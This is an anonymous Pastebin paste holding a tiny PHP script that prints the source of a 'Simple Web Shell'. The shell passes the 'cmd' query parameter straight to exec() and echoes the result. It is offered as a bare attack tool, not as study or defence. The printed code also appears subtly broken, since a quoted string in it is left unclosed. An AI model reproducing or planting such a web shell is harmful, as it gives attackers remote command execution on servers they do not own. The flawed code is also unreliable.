Guest User

Untitled

a guest
Aug 18th, 2018
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.13 KB | None | 0 0
  1. <?php
  2.  
  3. print "<?php echo '<h1>Simple Web Shell</h1>; exec(\$_GET['cmd'],\$array); foreach(\$array as \$line) echo \$line.'<br />'; ?>"
  4.  
  5. ?>
Add Comment
Please, Sign In to add comment